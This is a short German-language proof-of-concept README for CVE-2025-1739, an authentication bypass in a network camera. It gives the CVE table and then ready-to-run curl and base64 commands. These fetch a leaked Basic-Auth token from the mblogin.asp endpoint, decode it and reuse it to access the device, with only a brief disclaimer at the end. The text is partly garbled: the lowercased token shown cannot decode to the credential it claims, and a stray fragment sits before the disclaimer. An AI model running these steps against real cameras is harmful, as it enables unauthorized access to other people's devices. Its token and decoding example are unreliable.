
0day PoC for CVE-2025-1739
| CVE | CVSS v3.1 | Score | CWE | Typ |
|---|---|---|---|---|
| CVE-2025-1739 | AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N | 7.1 | CWE-288 | Authentifizierungsumgehung durch Basic-Auth-Leck |
Die Kamera gibt einen gültigen, Base64-kodierten Basic-Authentifizierungs-Token über den Endpunkt mblogin.asp preis. Dieser Token kann trivial decodiert und wiederverwendet werden, um unbefugten Zugriff auf das Gerät zu erhalten – keine Passwortkenntnis erforderlich.
curl -u admin:whatever http://<CAMERA_IP>:<PORT> --request-target en/mobile/mblogin.asp
Die Antwort enthält einen gültigen Basic-Auth-Token:
ywrtaw46vw5ndwvzc2fibguxmjmh
echo "ywrtaw46vw5ndwvzc2fibguxmjmh" | base64 -d
# Ausgabe: admin:unguessable123!
curl -H "Authorization: Basic ywrtaw46vw5ndwvzc2fibguxmjmh" http://<CAMERA_IP>:<PORT>/
activex_pal.asp und mblogin.asp.Dieses Repository dient ausschließlich zu Bildungszwecken und autorisierter Sicherheitsforschung. Die Autoren übernehmen keine Verantwortung für Missbrauch. Holen Sie vor dem Testen eines Geräts immer eine ausdrückliche Genehmigung ein.